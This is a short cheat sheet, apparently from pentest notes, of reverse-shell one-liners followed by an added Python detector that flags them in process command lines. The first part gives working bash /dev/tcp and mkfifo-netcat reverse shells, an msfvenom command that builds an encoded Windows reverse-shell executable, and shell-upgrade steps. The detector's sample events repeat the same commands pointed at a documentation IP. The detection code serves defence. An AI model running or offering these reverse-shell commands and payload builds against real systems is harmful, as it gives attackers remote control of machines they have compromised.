Reverse Shell
One-Liners
Bash
bash -i >& /dev/tcp/<IP>/<port> 0>&1
Netcat
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc <IP> <port> >/tmp/f
When one one-liner fails on a given target, another often works. Two good cheatsheets of alternatives are pentestmonkey and highoncoffee.
Generate Payload
Msfvenom
Windows reverse shell with encoder
msfvenom -p windows/shell_reverse_tcp -a x86 --encoder x86/shikata_ga_nai LHOST=<Your IP> LPORT=<Listening Port> -f exe -o <Shell Name>.exe
Shell Cushions
If the reverse shell is terminal-based, a few steps make it considerably more comfortable to use.
Spawn TTY
Python
python -c 'import pty;pty.spawn("/bin/bash")'
There are additional ways to spawn a TTY.
Auto-Completion
Background the process with Ctrl+z.
Run this in your local terminal to put it in raw mode (keystrokes are passed straight through without line processing) and to disable local echo.
stty raw -echo
Return to the backgrounded process with fg, then press Enter twice.
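From the defender's side, every step above leaves a distinctive process command line: the /dev/tcp redirect, the mkfifo-to-netcat pipe, python's pty.spawn() and the stty raw -echo mode switch. The following is an added example, not code from the original page: a small detector that runs regex rules over exec events and rates a batch of events by which indicators fired together. The event schema (a dict with pid and cmdline per exec) and the sample events are constructed assumptions standing in for an auditd EXECVE or EDR process feed; the rule names are invented here.

```python
import re
from typing import NamedTuple

# Detection rules derived from the one-liners above. Each regex runs against a
# process's full command line as recorded by an exec-auditing source (auditd
# EXECVE records, an EDR process feed, etc.).
RULES = {
    # bash using its /dev/tcp pseudo-device: redirect to an IPv4 host and port
    "bash_dev_tcp": re.compile(r"/dev/tcp/\d{1,3}(?:\.\d{1,3}){3}/\d+"),
    # named pipe fed into a shell whose output is piped to nc/ncat/netcat
    "mkfifo_netcat_pipe": re.compile(
        r"mkfifo\s+\S+.*\b(?:nc|ncat|netcat)\b\s+\S+\s+\d+"
    ),
    # python spawning an interactive shell on a pseudo-terminal
    "python_pty_spawn": re.compile(r"\bpty\.spawn\(\s*['\"]?/bin/(?:ba)?sh"),
    # terminal switched to raw mode with echo off (noisy on its own)
    "stty_raw_noecho": re.compile(r"\bstty\s+raw\s+-echo\b"),
}

REVERSE_SHELL_RULES = {"bash_dev_tcp", "mkfifo_netcat_pipe"}
TTY_UPGRADE_RULES = {"python_pty_spawn", "stty_raw_noecho"}


class Hit(NamedTuple):
    rule: str
    pid: int
    cmdline: str


# Constructed sample events (not real telemetry). The schema is an assumption:
# one dict per exec, carrying the pid and the full command line.
SAMPLE_EVENTS = [
    {"pid": 4101, "cmdline": "bash -i >& /dev/tcp/203.0.113.10/4444 0>&1"},
    {"pid": 4102, "cmdline": "sh -c rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 203.0.113.10 4444 >/tmp/f"},
    {"pid": 4103, "cmdline": 'python -c import pty;pty.spawn("/bin/bash")'},
    {"pid": 4104, "cmdline": "stty raw -echo"},
    {"pid": 4105, "cmdline": "bash -c cat /etc/hostname"},                 # benign
    {"pid": 4106, "cmdline": "python -c import pty; print(pty.__doc__)"},  # benign
]


def scan_events(events):
    """Return one Hit per (event, rule) pair whose command line matches."""
    hits = []
    for ev in events:
        for name, rx in RULES.items():
            if rx.search(ev["cmdline"]):
                hits.append(Hit(name, ev["pid"], ev["cmdline"]))
    return hits


def assess(events):
    """Rate a batch of events. A reverse-shell indicator seen together with a
    TTY-upgrade indicator is the strongest signal; stty raw -echo on its own is
    something any interactive user may run, so it only rates low."""
    fired = {h.rule for h in scan_events(events)}
    if fired & REVERSE_SHELL_RULES and fired & TTY_UPGRADE_RULES:
        severity = "high"
    elif fired & REVERSE_SHELL_RULES or "python_pty_spawn" in fired:
        severity = "medium"
    elif fired:
        severity = "low"
    else:
        severity = "none"
    return {"rules": sorted(fired), "severity": severity}


if __name__ == "__main__":
    for h in scan_events(SAMPLE_EVENTS):
        print(f"{h.rule:20} pid={h.pid}  {h.cmdline}")
    print(assess(SAMPLE_EVENTS))
```

The point of the correlation in assess() is noise control: stty raw -echo and even pty.spawn() have legitimate uses, so an alert on either alone would page constantly, whereas a /dev/tcp or mkfifo-to-nc command line followed in the same session by a TTY upgrade is hard to explain innocently. In production the rules would key on the full argv from the exec record rather than the process name, since all four patterns live in arguments.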